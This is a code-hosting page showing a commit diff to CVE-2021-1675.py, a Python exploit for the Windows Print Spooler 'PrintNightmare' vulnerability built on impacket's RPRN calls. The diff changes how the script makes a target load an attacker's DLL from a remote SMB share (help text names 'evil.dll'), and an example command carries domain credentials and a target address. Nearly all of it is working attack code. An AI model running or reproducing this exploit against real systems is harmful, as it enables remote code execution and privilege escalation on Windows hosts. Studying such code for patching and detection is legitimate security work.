r3pek/CVE-2021-1675
1
0
Fork 0
mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2025-04-19 11:04:03 +01:00
Code Releases Activity

Merge ee5512a692 into 18fde4bfec

Browse source
This commit is contained in:
Sylvain Peyrefitte 2021-07-04 15:56:40 -04:00 committed by GitHub
commit a79384095b
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 22 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

29
CVE-2021-1675.py
View file

@ -66,13 +66,13 @@ def getDrivers(dce, handle=NULL):
return blob return blob
def main(dce, pDriverPath, share, handle=NULL): def main(dce, pDriverPath, driverName, share, handle=NULL):
#build DRIVER_CONTAINER package #build DRIVER_CONTAINER package
container_info = rprn.DRIVER_CONTAINER() container_info = rprn.DRIVER_CONTAINER()
container_info['Level'] = 2 container_info['Level'] = 2
container_info['DriverInfo']['tag'] = 2 container_info['DriverInfo']['tag'] = 2
container_info['DriverInfo']['Level2']['cVersion'] = 3 container_info['DriverInfo']['Level2']['cVersion'] = 3
container_info['DriverInfo']['Level2']['pName'] = "1234\x00" container_info['DriverInfo']['Level2']['pName'] = "{0}0\x00".format(driverName)
container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00"
container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00' container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00'
container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share)
@ -84,18 +84,15 @@ def main(dce, pDriverPath, share, handle=NULL):
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage0: {0}".format(resp['ErrorCode'])) print("[*] Stage0: {0}".format(resp['ErrorCode']))
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" # Just ask for a new driver with already installed files
for i in range(1, 30): container_info['DriverInfo']['Level2']['pName'] = "{0}1\x00".format(driverName)
try: container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
print("[*] Stage{0}: {1}".format(i, resp['ErrorCode']))
print("[*] Stage1: {0}".format(resp['ErrorCode']))
if (resp['ErrorCode'] == 0): if (resp['ErrorCode'] == 0):
print("[+] Exploit Completed") print("[+] Exploit Completed")
sys.exit()
except Exception as e:
#print(e)
pass
if __name__ == '__main__': if __name__ == '__main__':
@ -105,6 +102,7 @@ Example;
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
""") """)
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>') parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('driverName', action='store', help='name of driver [need to be unique on target]')
parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'') parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')
parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?") parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?")
group = parser.add_argument_group('authentication') group = parser.add_argument_group('authentication')
@ -170,11 +168,4 @@ Example;
print("[+] pDriverPath Found {0}".format(pDriverPath)) print("[+] pDriverPath Found {0}".format(pDriverPath))
print("[*] Executing {0}".format(options.share)) print("[*] Executing {0}".format(options.share))
main(dce, pDriverPath, options.driverName, options.share)
#re-run if stage0/stageX fails
print("[*] Try 1...")
main(dce, pDriverPath, options.share)
print("[*] Try 2...")
main(dce, pDriverPath,options.share)
print("[*] Try 3...")
main(dce, pDriverPath,options.share)